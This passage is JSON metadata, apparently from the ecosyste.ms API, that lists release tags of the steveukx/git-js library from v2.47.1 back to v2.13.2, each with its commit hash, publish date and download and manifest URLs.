steveukx%2Fgit-js/tags/v2.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.47.1/manifests"},{"name":"v2.47.0","sha":"1ceac58f8c2168feada4220227884f9405519307","kind":"commit","published_at":"2021-10-19T19:18:01.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.47.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.47.0/manifests"},{"name":"v2.46.0","sha":"9b06cae085f550030e77bc6c721dcf7d7432f876","kind":"commit","published_at":"2021-09-29T14:28:06.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.46.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.46.0/manifests"},{"name":"v2.45.1","sha":"6da64948a0976a372b4b1797151453bd602b8199","kind":"commit","published_at":"2021-09-04T12:40:53.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.45.1","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.45.1/manifests"},{"name":"v2.45.0","sha":"f54b0f1012016ff61d116242bb6dc58e544fd9e0","kind":"commit","published_at":"2021-08-27T07:25:15.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.45.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.45.0/manifests"},{"name":"v2.44.0","sha":"e5df878890a2b15233bfc0509299820c234b46bf","kind":"commit","published_at":"2021-08-14T12:03:51.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.44.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.44.0/manifests"},{"name":"v2.43.0","sha":"1f8d2a01ddfeaec5b05c47fb902464bd7ab3a7f4","kind":"commit","published_at":"2021-08-13T07:58:20.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.43.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.43.0/manifests"},{"name":"v2.42.0","sha":"384ad0e31c06bab106ba0cf4a31487eeee8bb67d","kind":"commit","published_at":"2021-07-31T11:00:30.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.42.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.42.0/manifests"},{"name":"v2.41.2","sha":"7f17ce5c7d4e98507d94e893643b938d70c50e79","kind":"commit","published_at":"2021-07-29T11:09:08.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.41.2","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.41.2/manifests"},{"name":"v2.41.1","sha":"0f75aa476d91f9a761418f9815f745ac61d064b3","kind":"commit","published_at":"2021-07-11T08:37:11.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.41.1","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.41.1/manifests"},{"name":"v2.41.0","sha":"f665caad37a0d1a90fb799a75a0dfbba422d1f8a","kind":"commit","published_at":"2021-07-11T08:10:47.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.41.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.41.0/manifests"},{"name":"v2.40.0","sha":"9f32df42699edcc8d636dfce28c52517abeb8ea9","kind":"commit","published_at":"2021-06-14T07:49:05.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.40.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.40.0/manifests"},{"name":"v2.39.1","sha":"8603971b8772a49f21ef32440625c5ab52512edd","kind":"commit","published_at":"2021-06-09T08:05:24.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.39.1","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.39.1/manifests"},{"name":"v2.39.0","sha":"36db8a4b37b00c32e075a3f59d8b3932ec62aa65","kind":"commit","published_at":"2021-05-13T06:41:10.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.39.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.39.0/manifests"},{"name":"v2.38.1","sha":"d84a07a4ff96c072ff095d2cca9aa38197f1168d","kind":"commit","published_at":"2021-05-10T07:24:03.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.38.1","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.38.1/manifests"},{"name":"v2.38.0","sha":"cb56da3aee76223faf94ed207c28e396620a3eaa","kind":"commit","published_at":"2021-04-14T10:41:25.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.38.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.38.0/manifests"},{"name":"v2.37.0","sha":"256acf3179f916c8a369492de6dea44691d03f63","kind":"commit","published_at":"2021-03-15T19:26:18.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.37.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.37.0/manifests"},{"name":"v2.36.2","sha":"31bcf757612eddf5c825a74324ba64da7b672bfa","kind":"commit","published_at":"2021-03-11T09:20:10.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.36.2","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.36.2/manifests"},{"name":"v2.36.1","sha":"8423d24151fdd2c749eb8d648539ea3e2b02a556","kind":"commit","published_at":"2021-03-07T06:43:44.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.36.1","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.36.1/manifests"},{"name":"v2.36.0","sha":"e00263703de1b9a477dd0b92da4076150ca9e50a","kind":"commit","published_at":"2021-03-03T11:44:50.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.36.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.36.0/manifests"},{"name":"v2.35.2","sha":"4da9713d37e085013c26729f102588075bde1e20","kind":"commit","published_at":"2021-02-23T22:01:37.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.35.2","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.35.2/manifests"},{"name":"v2.35.1","sha":"49281bd17ecbbe2baf8f98312e0ab75c4ffce2dd","kind":"commit","published_at":"2021-02-19T08:42:18.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.35.1","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.35.1/manifests"},{"name":"v2.35.0","sha":"4443fd846b198e847b03b8d8c78cc2ae65e31305","kind":"commit","published_at":"2021-02-16T16:00:01.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.35.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.35.0/manifests"},{"name":"v2.34.2","sha":"91d6bfdb8c115c2511b55c0bccb3854d0e7775e7","kind":"commit","published_at":"2021-02-07T09:20:13.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.34.2","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.34.2/manifests"},{"name":"v2.34.1","sha":"f27a77fa9b026698bd7b97f5c10d58118c575fe0","kind":"commit","published_at":"2021-02-07T08:29:23.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.34.1","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.34.1/manifests"},{"name":"v2.34.0","sha":"0cf4593afc4e2b754439326836c04cb7188f5f17","kind":"commit","published_at":"2021-02-07T07:53:17.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.34.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.34.0/manifests"},{"name":"v2.33.0","sha":"98ae881f26cc2f44057fd814c047f8feb280a3c2","kind":"commit","published_at":"2021-02-06T10:36:19.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.33.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.33.0/manifests"},{"name":"v2.32.0","sha":"cf79662fd773829fcb6b414f5ec3a000e8b4c416","kind":"tag","published_at":"2021-02-04T17:52:00.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.32.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.32.0/manifests"},{"name":"v2.31.0","sha":"b0c0ec29e94d35d4038ed96b40198e8c682c2e6e","kind":"tag","published_at":"2020-12-17T08:01:56.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.31.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.31.0/manifests"},{"name":"v2.30.0","sha":"81e3fa99d5f01ccbf2622bede638fa40b009f1eb","kind":"tag","published_at":"2020-12-16T14:04:18.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.30.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.30.0/manifests"},{"name":"v2.29.0","sha":"f8a6a3ddc691bd0eb9fa02b7707fa19f89e4a1e1","kind":"tag","published_at":"2020-12-15T18:11:40.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.29.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.29.0/manifests"},{"name":"v2.28.0","sha":"ce7c0be621c4cb47698c77dea1c4bd00423ff03d","kind":"tag","published_at":"2020-12-15T11:53:25.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.28.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.28.0/manifests"},{"name":"v2.27.0","sha":"38991d19cccac2cac7c815c6f10589af8d490f0d","kind":"tag","published_at":"2020-12-11T10:18:53.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.27.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.27.0/manifests"},{"name":"v2.26.0","sha":"b85fad3837f61bed1567b9e3e9b1a30c022c8b4b","kind":"tag","published_at":"2020-12-09T21:00:27.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.26.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.26.0/manifests"},{"name":"v2.25.0","sha":"be261e33f42d3fe461c3724414ddcc931aa6cb38","kind":"tag","published_at":"2020-12-08T08:26:56.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.25.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.25.0/manifests"},{"name":"v2.24.0","sha":"082bcc12f38795efc7e3006e42359db8f56bbcd5","kind":"tag","published_at":"2020-11-27T12:12:53.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.24.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.24.0/manifests"},{"name":"v2.23.0","sha":"2df0f4590ad8aec4f8d6fcdbadcc6ee517cb5edb","kind":"tag","published_at":"2020-11-20T07:37:28.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.23.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.23.0/manifests"},{"name":"v2.22.0","sha":"94d0808bdf49ae5f583a69b5bfc99abd5a2d1d13","kind":"tag","published_at":"2020-11-13T07:24:39.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.22.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.22.0/manifests"},{"name":"v2.21.0","sha":"c874b53f4e445ab0ae0fe2a3f2d25a3cd8c0fbe9","kind":"tag","published_at":"2020-10-07T08:40:15.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.21.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.21.0/manifests"},{"name":"v2.20.1","sha":"588b4f8b3e5f98c783cfa04bd0d35eada4c30abd","kind":"tag","published_at":"2020-08-24T11:31:25.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.20.1","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.20.1/manifests"},{"name":"v2.20.0","sha":"7484af6ac7c5a8369c4c8bbebc4557c6344d7477","kind":"tag","published_at":"2020-08-24T09:16:26.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.20.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.20.0/manifests"},{"name":"v2.19.0","sha":"5e24a282cd905cf646a8715b8d116b229730c2b3","kind":"tag","published_at":"2020-08-21T02:00:56.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.19.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.19.0/manifests"},{"name":"v2.18.0","sha":"1a7a4d0badc1baa416d48e78ff0dd3a78f3395fb","kind":"tag","published_at":"2020-08-19T03:03:25.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.18.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.18.0/manifests"},{"name":"v2.17.0","sha":"27c3f1bceffad11ac73d2f6a10279033cda02acf","kind":"tag","published_at":"2020-08-03T16:10:32.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.17.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.17.0/manifests"},{"name":"v2.16.0","sha":"25b4e7c84772fff2309f5fe1f3c6130190cb9ad0","kind":"tag","published_at":"2020-08-02T16:40:01.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.16.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.16.0/manifests"},{"name":"v2.15.0","sha":"8f16b33b2a2fafc434fe7872c51933fb0b17a9b4","kind":"tag","published_at":"2020-07-23T11:31:45.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.15.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.15.0/manifests"},{"name":"v2.14.0","sha":"706aed49cd812f0f4a218f9f963c81316a2ea2fb","kind":"tag","published_at":"2020-07-20T09:08:38.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.14.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.14.0/manifests"},{"name":"v2.13.2","sha":"553ff0a33f127930c74b6d8e3690baee0b852c5e","kind":"tag","published_at":"2020-07-17T08:21:59.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/